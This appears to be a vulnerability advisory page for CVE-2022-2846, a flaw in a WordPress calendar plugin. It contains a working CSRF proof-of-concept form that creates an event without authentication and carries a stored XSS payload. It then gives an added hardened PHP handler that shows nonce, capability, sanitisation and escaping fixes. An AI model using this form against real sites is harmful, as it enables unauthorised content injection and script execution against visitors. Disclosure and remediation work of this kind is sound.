| Title | Published | Views | Family |
|---|---|---|---|
| Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to XSS Vulnerability | 5 Apr 2023 00:00 | – | zdt |
| CVE-2022-2846 | 16 Aug 2022 22:39 | – | circl |
| WordPress plugin Calendar Event Multi View cross-site request forgery vulnerability | 16 Aug 2022 00:00 | – | cnnvd |
| CVE-2022-2846 | 16 Aug 2022 00:00 | – | cve |
| CVE-2022-2846 Calendar Event Multi View < 1.4.07 - Unauthenticated Arbitrary Event Creation to Stored XSS | 16 Aug 2022 00:00 | – | cvelist |
| EUVD-2022-35080 | 3 Oct 2025 20:07 | – | euvd |
| CVE-2022-2846 | 16 Aug 2022 19:15 | – | nvd |
| Calendar Event Multi View 1.4.07 Cross Site Scripting | 5 Apr 2023 00:00 | – | packetstorm |
| Cross site scripting | 16 Aug 2022 19:15 | – | prion |
| PT-2022-19041 · WordPress · Calendar Event Multi View | 16 Aug 2022 00:00 | – | ptsecurity |
# Exploit Title: Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)
# Date: 2022-05-25
# Exploit Author: Mostafa Farzaneh
# WPScan page: https://wpscan.com/vulnerability/95f92062-08ce-478a-a2bc-6d026adf657c
# Vendor Homepage: https://wordpress.org/plugins/cp-multi-view-calendar/
# Software Link: https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.4.06.zip
# Version: 1.4.06
# Tested on: Linux
# CVE: CVE-2022-2846
# Description:
The Calendar Event Multi View WordPress plugin before 1.4.07 does not have
any authorisation or CSRF checks in place when creating an event, and is
also lacking sanitisation as well as escaping in some of the event fields.
This could allow unauthenticated attackers to create arbitrary events and
put Cross-Site Scripting payloads in them.
# POC and exploit code:
As an unauthenticated user, to add a malicious event (on October 6th, 2022)
to the calendar with ID 1, open the code below:
<html>
<body>
<form action="https://example.com/?cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=0&method=adddetails" method="POST">
<input type="hidden" name="Subject" value='"><script>alert(/XSS/)</script>' />
<input type="hidden" name="colorvalue" value="#f00" />
<input type="hidden" name="rrule" value="" />
<input type="hidden" name="rruleType" value="" />
<input type="hidden" name="stpartdate" value="10/6/2022" />
<input type="hidden" name="stparttime" value="00:00" />
<input type="hidden" name="etpartdate" value="10/6/2022" />
<input type="hidden" name="etparttime" value="00:00" />
<input type="hidden" name="stpartdatelast" value="10/6/2022" />
<input type="hidden" name="etpartdatelast" value="10/6/2022" />
<input type="hidden" name="stparttimelast" value="" />
<input type="hidden" name="etparttimelast" value="" />
<input type="hidden" name="IsAllDayEvent" value="1" />
<input type="hidden" name="Location" value="CSRF" />
<input type="hidden" name="Description" value='<p style="text-align: left;">CSRF</p>' />
<input type="hidden" name="timezone" value="4.5" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
The XSS will be triggered when viewing the related eventData.
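The three defects named in the description (no authorisation check, no CSRF check, no sanitisation or escaping) map onto three separate controls in a WordPress handler. The following is an added example written for this page, not the plugin's own code or its 1.4.07 fix: a hypothetical AJAX handler for creating an event that applies all three. The action name `example_cal_add_event`, the option key used as a stand-in for the plugin's storage, and the helper names are assumptions; the field names (`Subject`, `colorvalue`, `stpartdate`, `Description`, `Location`, `IsAllDayEvent`, `timezone`, `calid`) are taken from the PoC request above. It assumes it runs inside WordPress, where the `wp_*`, `esc_*`, `sanitize_*` and `check_ajax_referer` functions are provided by core.

```php
<?php
// Added example (not the plugin's code): a hardened event-creation handler.
// Assumes WordPress core is loaded; action and option names are hypothetical.

// Registered for logged-in users only. There is deliberately no
// 'wp_ajax_nopriv_example_cal_add_event' hook, so unauthenticated requests
// never reach the handler at all.
add_action( 'wp_ajax_example_cal_add_event', 'example_cal_add_event' );

function example_cal_add_event() {
    // 1. CSRF: the request must carry a nonce minted for this action
    //    (issued to the page's JavaScript via wp_create_nonce( 'example_cal_add_event' )).
    //    check_ajax_referer() dies with a 403 if the nonce is missing or wrong.
    check_ajax_referer( 'example_cal_add_event', 'nonce' );

    // 2. Authorisation: being logged in is not enough; require a capability.
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 3. Validation and sanitisation, field by field, using the PoC's field names.
    $subject = sanitize_text_field( wp_unslash( $_POST['Subject'] ?? '' ) );
    if ( '' === $subject || mb_strlen( $subject ) > 200 ) {
        wp_send_json_error( array( 'message' => 'invalid subject' ), 400 );
    }

    // Colour must be a literal hex colour; anything else falls back to a default.
    $color = (string) wp_unslash( $_POST['colorvalue'] ?? '' );
    if ( ! preg_match( '/^#(?:[0-9a-fA-F]{3}|[0-9a-fA-F]{6})$/', $color ) ) {
        $color = '#000000';
    }

    $start = example_cal_parse_date( (string) wp_unslash( $_POST['stpartdate'] ?? '' ) );
    $end   = example_cal_parse_date( (string) wp_unslash( $_POST['etpartdate'] ?? '' ) );
    if ( null === $start || null === $end || $end < $start ) {
        wp_send_json_error( array( 'message' => 'invalid date range' ), 400 );
    }

    // Description may carry limited markup: wp_kses_post() strips script tags,
    // event handlers and other disallowed HTML while keeping a safe subset.
    $description = wp_kses_post( wp_unslash( $_POST['Description'] ?? '' ) );
    $location    = sanitize_text_field( wp_unslash( $_POST['Location'] ?? '' ) );
    $all_day     = empty( $_POST['IsAllDayEvent'] ) ? 0 : 1;

    // Timezone offset is numeric and bounded; non-numeric input becomes 0.
    $tz = is_numeric( $_POST['timezone'] ?? null ) ? (float) $_POST['timezone'] : 0.0;
    $tz = max( -12.0, min( 14.0, $tz ) );

    $calid = absint( $_GET['calid'] ?? 0 );
    if ( 0 === $calid ) {
        wp_send_json_error( array( 'message' => 'invalid calendar id' ), 400 );
    }

    // Stand-in for the plugin's own storage: append to an option array.
    $events   = get_option( 'example_cal_events', array() );
    $events[] = array(
        'calid'       => $calid,
        'subject'     => $subject,
        'color'       => $color,
        'start'       => $start,
        'end'         => $end,
        'all_day'     => $all_day,
        'location'    => $location,
        'description' => $description,
        'timezone'    => $tz,
    );
    update_option( 'example_cal_events', $events );

    wp_send_json_success( array( 'id' => count( $events ) - 1 ) );
}

// Accepts only the m/d/Y form used by the PoC (with or without zero padding) and
// rejects overflowed values such as 13/40/2022; returns Y-m-d or null.
function example_cal_parse_date( $value ) {
    $dt = DateTime::createFromFormat( '!m/d/Y', $value );
    $errors = DateTime::getLastErrors();
    if ( false === $dt || ( $errors && ( $errors['warning_count'] || $errors['error_count'] ) ) ) {
        return null;
    }
    return $dt->format( 'Y-m-d' );
}

// 4. Output escaping, chosen per context: attribute, text node, and the
//    already-filtered HTML description. Sanitising on input does not replace this.
function example_cal_render_event( array $event ) {
    return sprintf(
        '<div class="cal-event" style="background:%s"><strong>%s</strong> <em>%s</em> %s</div>',
        esc_attr( $event['color'] ),
        esc_html( $event['subject'] ),
        esc_html( $event['location'] ),
        wp_kses_post( $event['description'] )
    );
}
```

With this handler the PoC form above fails at three independent points: the `nopriv` hook is absent, so an unauthenticated browser never reaches the code; a cross-site form cannot supply a valid `nonce`, so `check_ajax_referer()` stops it even for a logged-in victim; and the `Subject` payload is reduced to plain text by `sanitize_text_field()` and then escaped again by `esc_html()` at render time, so it can no longer be interpreted as markup when the event is viewed.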